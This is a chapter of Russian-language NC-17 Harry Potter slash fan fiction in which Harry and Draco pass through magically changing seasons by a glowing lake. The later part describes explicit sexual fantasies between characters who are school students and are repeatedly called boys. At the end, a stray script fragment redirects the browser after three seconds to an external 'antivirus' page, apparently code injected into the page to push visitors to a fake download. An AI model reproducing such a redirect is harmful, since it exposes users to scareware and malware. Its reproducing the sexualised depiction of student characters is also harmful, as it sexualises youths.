Ничья земля

Автор: Umbridge
Пайринг: Гарри Поттер/Драко Малфой
Рейтинг: NC-17
Жанр: action/agnst/romance
Саммари: Добро пожаловать! Вас приветствует НИЧЬЯ ЗЕМЛЯ! Забудьте все, чем вы были раньше. Здесь нет власти, но есть правила. Соблюдайте их - и вы выиграете!
Предупреждение: гет в 10 и 11 главах. ГП/ДУ, ДМ/НЖП, АУ 7 книги

Глава 6. Времена года

(Глава, в которой время летит незаметно, Гарри борется с собой, а Драко пытается согреться)

Слизеринец молчал уже несколько часов, и это здорово раздражало Гарри. Он почему-то чувствовал себя виноватым перед Драко, то ли за то, что подверг его жизнь опасности, то ли за то, что спас ее. Звук сглатываемой слюны резал слух. Хотелось вообще перестать глотать и дышать. В темном небе не было ни одной звезды, и казалось, что солнце уже никогда не выйдет из-за горизонта. Гарри мечтал, наконец, расшевелить своего спутника, слушая печальный отзвук его шагов.

 Драко устало брел следом и, глядя на мантию идущего впереди мальчика, пытался представить его прямую, сильную спину, скрытую тканью, думать о ней, о том, как двигаются мускулы под кожей, когда он идет. Но снова и снова видел, как падает в пропасть, и от ужаса воздух замерзал в легких. Страх смерти напоминал об одиночестве и беспомощности перед неизбежным концом. Драко охватывало желание сесть, обхватить голову руками и не двигаться. Мучительно, просто нестерпимо хотелось согреться. Воспоминания о детской кроватке, об одеяле на мгновение всплывали откуда-то со дна памяти, но едва он успевал зацепить их - вырывались и тонули, оставляя после себя чувство невосполнимой утраты. Хотелось снова стать ребенком, вверяющим себя в руки всемогущей матери, и истошным криком требующим внимания, не допуская даже мысли о том, что она может отказать.

Тем временем становилось теплее. Дорога превратилась в узкую тропу, и теперь спускалась среди поросших мхом камней в расщелину между скалами. Внизу, звонкий и шумный, бежал горный ручей. Пахло свежестью и влажной древесиной.

- Малфой, - позвал Гарри, - А тут не плохо, правда?

Драко посмотрел на него и ничего не ответил. От этого тяжелого взгляда гриффиндорцу стало не по себе.

- Малфой, может быть, у тебя что-нибудь болит? Скажи, если так, -  снова заговорил он, думая, что Драко нужна поддержка, или, может быть, какая то помощь. Но тот молчал.

- Спой что-нибудь, я не против, - Гарри в третий раз предпринял попытку разговорить спутника, но ответом ему была тишина, нарушаемая только журчанием быстрой воды.

- Молчишь, - мрачно констатировал гриффиндорец, - я тоже могу молчать, причем совершенно не напрягаясь. Очень долго. Мне вообще не нужна компания.

С этими словами Гарри уставился себе под ноги, решив не пытаться заговорить с Малфоем до привала. В поисках места для ночлега они шли дальше, мимо низкорослых кривых деревьев, по берегу холодного ручья. Было тихо, и только пар их дыханий таял в темноте. Преодолев еще, по крайней мере, милю, они увидели пятно света вдали.

- Смотри, Малфой… Как думаешь, что это может быть? – спросил Гарри, показывая на возвышавшийся впереди лес, будто плывущий в голубоватом тумане. Но ответа снова не дождался. Чем дальше они шли между выросшими и выпрямившимися деревьями, которые обступали дорогу, тем сильнее становилось свечение. В какой-то момент тропинка кончилась, и маги вышли к озеру. Вот тут Драко заговорил.

- Поттер… - прошептал он, придвигаясь к Гарри и касаясь плечом его плеча, - смотри, бабочки…

Увиденное изумило и восхитило гриффиндорца. По поверхности лазурного озера к берегам растекался теплый голубой свет, который, казалось, шел с самого дна, сквозь чистую, прозрачную воду. Над ее поверхностью метались стрекозы. Рядом, склоняя длинные ветви к самой воде, шелестели ивы. Вокруг, среди высокой ярко-зеленой травы белой россыпью мелькали головки ромашек, к земле клонились веточки вереска, яркими проблесками алели маки. Когда Гарри коснулся пальцами черной звезды в сердце цветка, ему показалось, что он касается бархата. И повсюду, легкие и яркие, порхали  бабочки. Гарри поднял голову. Вверху, где-то в густой листве окружавших озеро деревьев, звенели голоса невидимых птиц.

 Но больше всего поражал запах. Он был ласковым, обволакивал ноздри, грел легкие. Здесь пахло летом. Пахло самыми драгоценными воспоминаниями, дарившими радость. В этом запахе была нежность, заключавшая в себе грусть, и юность пронзительная в своей конечности. Хотелось закрыть глаза и дышать, дышать. Гарри почувствовал, как его сердце наполняет что-то едва уловимое, трепетное и печальное.

- Малфой, это тебе, - Гарри сорвал ромашку и протянул Драко, - пожалуйста, поговори со мной.

- Ну, раз ты так просишь… - ответил Драко. Собственный голос показался ему странно чужим. Он смущенно посмотрел на неожиданный подарок. Взял его и неловко сжал стебель в кулаке. – Я подумаю…

- Думай, - разрешил Гарри и  вытер рукой лоб. Только сейчас он заметил, что здесь жарко. Гарри снял плащ и бросил его на траву.

- А пока ты думаешь – давай поужинаем, - сказал он, отвязывая от пояса брюк мешок, - Я устал.

- Хм… Я тоже, - признался Драко, украдкой пряча цветок в карман мантии. Скинув туфли и закатав рукава, сел вслед за гриффиндорцем на траву.

- О! Привет от Волдеморта? – неожиданно мрачно поинтересовался Гарри. Слизеринец сразу понял, что увидел школьный враг. На предплечье темнела метка, та самая, которой отмечал своих приспешников Темный Лорд. Драко потянулся закрыть ее:

- Убедился, Поттер?

- Да, - усмехнулся Гарри, сбросив мантию, - я знал, что она у тебя есть.

- Знал? – Драко поднял брови, - не удивительно… Ты шпионил за мной целый год. Не понимаю, почему ты никому не сказал?

- Ха! Можно подумать, меня кто-то слушал! – ответил гриффиндорец, разламывая пирог с крольчатиной. - Да и потом, точно я убедился во всем только перед тем, как ты слинял со Снейпом. Когда ты собирался убить директора Авадой, но так и не решился.

- Что? – Драко порозовел, - не было такого!

- Было. Я видел. И слышал, - ответил Гарри, глядя на него  в упор, - но теперь все это неважно.

- Ты видел? – прошептал Драко, - видел меня и Дамблдора на Астрономической башне? Не может быть… Тебя же там не было…

- Был, - гриффиндорец невозмутимо пожал плечами.

- И не помешал мне?

- Нашлись и без меня желающие. Но это не имеет значения. Ты будешь есть или нет? – раздражаясь, спросил Гарри. Капля пота скатилась за воротник рубашки-поло. Он смахнул ее тыльной стороной ладони и стянул рубашку через голову. Драко собирался ответить, но не стал, молча глядя, как напрягаются мышцы на руках Поттера, когда он раздевается, на темные волосы на животе, уходящие широкой стрелкой за пояс брюк. 

- Малфой,  куда ты смотришь? – поднял брови Гарри, и слизеринец порозовел.

- Давай сюда мешок. – Резко бросил Драко, и, вытащив сэндвич, начал жевать.

- Малфой! Плащ! – хмуро процедил гриффиндорец, указывая взглядом на пальцы Драко, которые тот снова вытирал о ткань.

- Я в шоке от твоей мелочности, Потти! Он все равно уже грязный! – возмутился слизеринец, медленно убирая руку.

Гарри покачал головой, и они продолжили есть, думая каждый о своем. Драко рассматривал нос Поттера, крупный с небольшой горбинкой, изучал его ноздри, трепетавшие, когда тот вдыхал. А Гарри размышлял о том, как сформулировать свой вопрос Ничьей земле, чтобы ответ получился наиболее полным. Ведь ему надо было знать точные места, где находятся оставшиеся хоркруксы. Маки увяли. Теперь среди потускневшей  травы вытягивались незнакомые желтые цветы,  крупные головки которых возвышались в мягком свете озера. Жара постепенно спадала, превращенная прохладным ветром в зыбкое августовское тепло.

Занятые своими мыслями, молодые люди не замечали перемены, происходившие вокруг. Воздух был еще по-летнему ласковым, но в нем уже угадывался легкий запах тления и близких холодов. Первый золотой лист упал на зеленую траву. Зацвели ярко красные, пышные сентябрьские цветы. Когда порыв холодного ветра окатил магов, Драко поежился. Он опустил рукава и надел туфли. А листья, багряные, желтые и рыжие, кружась, ложились на светящуюся загадочным светом поверхность озера. Они, словно маленькие лодки, трепетные и хрупкие, танцевали в позеленевшей воде.

- Поттер, - Драко засунул в рот остатки бутерброда и обхватил себя за плечи. – Происходит что-то странное, тебе не кажется? Мне холодно.

Гарри встал, натягивая рубашку. Надев мантию и оглядываясь, сделал несколько шагов.

- По-моему, здесь наступает осень, Малфой, - сказал он, нахмурившись.

- Не может быть! – удивился Драко, озираясь.- Совсем недавно было жарко. Осень не может наступить так быстро!

- Не может, - согласился Гарри, наклоняясь и поднимая мешок, - но она наступает. Посмотри!

Драко изумленно взирал на опадающие листья, увядающие цветы и травы.

- Может быть, это можно объяснить как-то иначе… - выдавил он, наконец.

- Как? – поинтересовался Гарри.

- Как, как… Подумать не можешь что ли? – протянул слизеринец, злой от того, что на ум ничего не приходит.

- Я подумал, и все еще считаю, что наступает осень. – Пожал плечами Гарри.

Промозглый ветер забирался под полы мантии слизеринца, обдувая голые колени. Драко подобрал ноги и поежился. Становилось холоднее. Спустя час трава пожухла, а бабочки исчезли. Последние темно-багряные листья, паря во влажном воздухе,  опускались на землю. Гарри почувствовал, как что-то мокрое скатилось за воротник рубашки, ударило в запястье, ледяной пулей стукнуло по лбу. Он выставил перед собой открытую ладонь. Острые холодные капли наполнили ее влагой.

- Идем под дерево, - сказал Малфою Гарри, плотнее запахивая мантию  и поднимая с земли плащ, с которого поспешно вскочил Драко.

- Отвратительно, - выдохнул слизеринец, наблюдая из-под широколапой ели за моросящим  по земле дождем, превратившим место их стоянки в грязевое месиво.

- Да. Не повезло, - задумчиво произнес Гарри, прикидывая, где им теперь спать. Он посмотрел на продрогшего Малфоя, волосы которого намокли несмотря на ветки над головой. – Хочешь – одень мою мантию…

- А что не предложишь плащ, Поттер? – сдерживая зубную дробь, спросил Драко.

- Ты же потом мне его не отдашь, - ответил Гарри, - так что?

- Давай, - кивнул слизеринец быстро.

Спрятавшись под деревом, мальчики наблюдали за тем, как дождь постепенно кончается, уступая место мокрому снегу, ложившемуся липким неровным слоем на черную голую землю.

- Малфой, - позвал Гарри, - после побега ты встречал Волдеморта?

Драко ухмыльнулся дрожащими губами.

- Не твоего ума дело, Потти. Если и да, то что?

- Где? – спросил гриффиндорец, кутаясь в грязный плащ, пахнущий илом и сэндвичами.

- Где, где… Где надо… - огрызнулся Драко вяло. Ему очень хотелось рассказать Поттеру все. Но он боялся, что Лорд прочитает его мысли, если Драко доведется вернутся обратно. – Может и не только его. Может, еще кое-кого, кто тебе не нравится.

- Кого?

- Ох, какой же ты любопытный. – Покачал головой Драко, отчаянно улыбаясь.

Тем временем снег кончился.

Голые ветви деревьев чернели в неверном свете озерной глади. В морозном чистом воздухе пахло прелой листвой. Вода начала покрываться первой тонкой коркой льда. Стоять на месте стало невозможно. Необходимо было двигаться, чтобы ноги не мерзли в легких туфлях.

- Поттер! – изо рта Драко вырвалось облако белого пара, - я отморожу себе задницу! Отдай мне свои штаны.

- Может тебе еще и трусы отдать? – поинтересовался Гарри, прохаживающийся туда сюда по берегу.

Слизеринец спрятал руки в рукава как в муфту.

- Поттер! – крикнул он посиневшими губами, - я умру от переохлаждения. Тебе надо что-то предпринять!

- Надо, но не мне, а тебе! – бросил Гарри раздраженно, - одеваться надо теплее. Мерлинова борода… Я и так отдал тебе свою мантию.

Лед на озере окреп, и подводный свет тускло пробивался через его толщу. Снова повалил снег, большие белые хлопья на темном небе. Гарри и Драко устало бродили по берегу. Гриффиндорец, завернувшись в плащ, пробовал прыгать, бегать, притоптывать, изображая нечто наподобие пляски святого Витта. Драко с силой хлопал себя по плечам, и пританцовывал у самой кромки воды. Но мальчики мерзли все сильнее.

- Поттер, если ты срочно что-нибудь не предпримешь, мы оба замерзнем! – донесся до Гарри звенящий шепот Малфоя.

- Что я, по-твоему, должен сделать? – ехидно спросил гриффиндорец. Распахнув плащ, он открыл мешок. Из того, что в нем было, только мантия-невидимка могла пригодиться. Гарри вытащил ее и накинул себе на плечи. Снег падал на оставшуюся непокрытой голову, а телу стало необыкновенно тепло, одежда высохла. На земле под ногами Гарри растаял снег, и появилась молодая трава. «Похоже, я неплохо перезимую», - подумал он, но, посмотрев на Малфоя, смутился. Тот стоял с закрытыми глазами, прислонившись к дереву, и кутался в мантии, которые все равно были слишком тонкими, чтобы согреть.

- Малфой, - позвал гриффиндорец громко, но тот не отзывался. Тогда Гарри подошел к нему и встряхнул за плечи:

- Малфой, ты что? Спать нельзя, надо двигаться.

- Не хочу, -  вяло отмахнулся Драко, не открывая глаз, - я устал, хочу спать.

- Ну, хорошо, сейчас, - сказал Гарри, и, сняв мантию-невидимку, накрыл ей слизеринца, - так лучше?

- Что это? – удивился Драко, очнувшись. – Мантия-неведимка?

- Да, - вздохнул Гарри.

- Так вот откуда у Воющей хижины взялась твоя голова! – Воскликнул слизеринец потрясенно.\

- Да, оттуда… А ты что подумал?

- Ничего, - сказал Драко и замолчал. Не мог же он рассказать Поттеру о том, как постоянно думал о нем, и испугался, что тот начинает ему мерещиться.

- Ладно, - Гарри понял, что ничего большего не дождется,  - ложись и отдыхай.

Тот послушно лег, накрывшись с головой. Полежав немного, он выглянул.

- А мешок? – крикнул Драко гриффиндорцу, оставшемуся под деревом.

Гарри закатил глаза, и с раздражением бросил его слизеринцу.

- Спокойной ночи, Потти, - протянул Драко, схватив добычу и спрятавшись. Ему стало тепло и уютно. Ничто не напоминало о холоде снаружи. Не хватало только гриффиндорца.

А снег все падал, укрывая деревья и светящийся лед. Гарри переступал с ноги на ногу, думая о странных желаниях, пугавших его. Ему хотелось оказаться на месте собственной мантии, обнимавшей слизеринца за плечи, согревавшей тонкое тело. Хотелось стать землей, на которой лежит Драко, теплый и сонный. Гарри тряхнул головой. Он решил замерзнуть, только бы не оказаться рядом с Малфоем в жаркой тесноте под мантией. Однако чем суровее становился мороз, тем меньше Гарри боялся. В конце концов, он подбежал к мантии-невидимке и забрался под нее. Дрожа от холода, повернулся спиной к Драко.

- Замерз, Потти? – раздался ехидный, манерный голос.

- Спокойной ночи, Малфой, -  сказал Гарри сухо, отодвигаясь от слизеринца как можно дальше.

- Поттер, - снова заговорил тот, - постели плащ.

- Спи, - ответил Гарри холодно.

- Не могу спать на голой земле, она жесткая, – капризно отозвался Драко.

- Принцесса  на горошине, - мрачно процедил гриффиндорец. Мальчики расстелили плащ на земле и снова легли.

- Спокойной ночи, Поттер, - сказал Драко довольным тоном и затих.

Злой Гарри снова повернулся к школьному врагу спиной.

Он закрыл глаза, но перед его внутренним взором неожиданно появился голый Драко, моющийся в оранжевой воде. Гарри открыл глаза и уставился в темноту ночи, стараясь отвлечься от близости чужого тела. Слизеринец лежал совсем рядом, и это волновало и пугало его. Гарри старался не думать ни о чем, но раскаленный металл в паху не позволял ему отвлечься. Стоило смежить веки, и он начинал видеть картины одна откровеннее другой, и не мог никуда от них деться. В конце концов, Гарри все-таки задремал, погружаясь в сон, полный похотливых мокрых видений.

Драко лежал тихо, прислушиваясь к шумам снаружи. Сначала выл ветер, потом вьюга стихла, и было видно, как падает мягкий снег. Мальчик устал, но старался не заснуть. Положив мешок под голову, слизеринец фантазировал. Представлял, как они с Поттером поворачиваются друг к другу и начинают целоваться.  Гарри ласкает языком его губы, а пальцами забирается под подол мантии и проводит по внутренней стороне бедер от кромки чулок до ягодиц. Потом ложится сверху и входит в него, так будто делал это миллионы раз, властно и уверенно. Или лучше, если Драко обхватит губами его член или прильнет ртом к тугому горячему сфинктеру, и от желания сведет ноги, а пах нальется мучительной тяжестью.

Лежа в нескольких дюймах от Поттера, Драко так распалил себя, что только страх быть пойманным не позволял ему повернуться к гриффиндорцу и прижаться покрепче. Он зажмурился, стараясь дышать тише. Драко боялся даже пошевелиться, так что мысль помочь себе достичь разрядки пришлось оставить.  Промучившись какое-то время, мальчик все таки заснул. Проваливаясь в сон, он подумал, что стало теплее и будто ему слышно журчание множества ручейков, стекавшихся в озеро.

            Гарри было очень хорошо. Странное чувство охватило его. Словно он выпил немного, и томительное желание растеклось по телу вместе с алкоголем. Словно вернулся домой после долгой дороги и обнял кого-то дорогого. Гриффиндорец еще не понял до конца, проснулся он или по-прежнему спит. Постепенно, к нему возвращалось осознание того, где он и почему. Под мантией было тепло, даже жарко. Гарри открыл глаза и увидел перед собой белобрысый затылок. Еще через секунду он осознал, что обнимает слизеринца, сжимая его влажную ладонь, а напряженный член, недвусмысленно оттягивающий ткань брюк, тесно прижимается к заднице Драко. Гарри осторожно разжал пальцы. Отодвинувшись, аккуратно приподнял край мантии-невидимки. Свежая весенняя трава пробивалась из-под земли прямо перед его носом. Он глубоко вздохнул и вылез из душных недр. Ярко светило солнце, сверкая на влажных молодых листьях. Высоко в ветвях звенели голоса невидимых птиц. Гарри присел на колени у берега и плеснул себе в лицо водой. Она оказалась холодной, но это привело гриффиндорца в чувство. Он встал и огляделся, стараясь преодолеть странное волнение и отвлечься от пугающих мыслей. В это время Драко вылез наружу.

- Поттер! – Протянул он, выгибаясь и потягиваясь, -  весна пришла!

Преодолев смущение, Гарри посмотрел на слизеринца. Тот стоял, вытянув руки перед собой, зажмурившись, в мятой поттеровской мантии, растрепанный и заспанный. И Гарри тянуло к нему. Гриффиндорец еле заметно мотнул головой, пытаясь избавиться от наваждения. «Это все магия. Я не могу ничего к нему чувствовать», - промелькнула паническая мысль.

            Драко решил делать вид, что не помнит, как Поттер обнимал его этим утром. Но маленький план работал, так он решил для себя. Подойдя к самой воде, Драко наклонился и украдкой взглянул в нее как в зеркало.

- Мамочка… - прошептал он, автоматически приглаживая волосы, тут же снова падавшие на лоб, - нет, нет, это озеро врет.

Забыв про наблюдающего за ним Гарри, слизеринец набрал в ладони воды, разрушая свое опухшее, лохматое отражение,  и умылся.

- Ух, холодная какая, - сказал он тихо, и снова посмотрел на себя, проведя мокрой рукой по волосам. Теперь все выглядело гораздо лучше: прическа была аккуратной, а глаза открылись. Драко улыбнулся себе.

- Малфой, ты влюбился в свое отражение? – ледяной голос Гарри привел его в чувство.

- В отличие от твоего, Потти, в мое можно влюбиться, - бросил он, чувствуя, как розовеют щеки, - мог бы пока устроить нам завтрак, что ли…

- Я похож на домового эльфа? – раздраженно ответил Гарри, одевая свою дорожную мантию, оставленную слизеринцем на траве, и отгоняя видение завернувшегося в нее Драко. Потом сложил и убрал в мешок мантию-невидимку. 

- Что-то есть… - протянул Драко, садясь на плащ. Вокруг уже распускались первые весенние цветы, над головами мальчиков в кружевах листьев проглядывало густо-синие небо.

- Не продолжай, – процедил Гарри, садясь напротив.

- Отчего же, - хмыкнул слизеринец, отпивая из фляги, - я слышал, ты вырос среди магглов, и выполнял все их приказания.

- Кто тебе сказал?

- Какая разница?

- Твой папаша?

Драко почувствовал, как холодеет лицо. Он вспомнил своего отца, вспомнил, как тот кричал, когда Темный Лорд наказывал его. Куда дели тело, после того, как убили его?

- Нет, - ответил слизеринец тихо.

- Мать?

- Нет. Смешно, что тебя это волнует.

- Кто был с тобой после побега? – Спросил Гарри, снова возвращаясь к давно оставленной теме.

- Снейп и тетка,  - внезапно ответил Драко.

- Лестранж? – переспросил Гарри, откладывая бутерброд на траву.

- Да.

- Что она там делала?

- Поттер, - Драко облизал сухие губы, - я и так тебе рассказал слишком много.

- Ты что, боишься? Или остаешься верным своему хозяину? – зло поинтересовался Гарри.

- Нет, - выдохнул Драко и осекся. Это было уже слишком. – Поттер, да какая разница, что она делала?  Разговаривала со Снейпом, например, о какой-то ерунде, заходила к Лорду…

- Так он был там же, где и ты? – Гарри тут же поймал Драко на слове.

- Поттер! Это все не твоего ума дело, понятно? – вспыхнул слизеринец, и откусил большой кусок сэндвича, чтобы больше ничего не сболтнуть. Драко сам не понимал, зачем разговаривает с врагом на такие темы.

Остаток завтрака прошел в молчании. В свежем воздухе снова порхали бабочки, пели птицы. Солнце сверкало на прозрачно голубой поверхности озера.

Предыдущая глава   Оглавление   Следующая глава

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>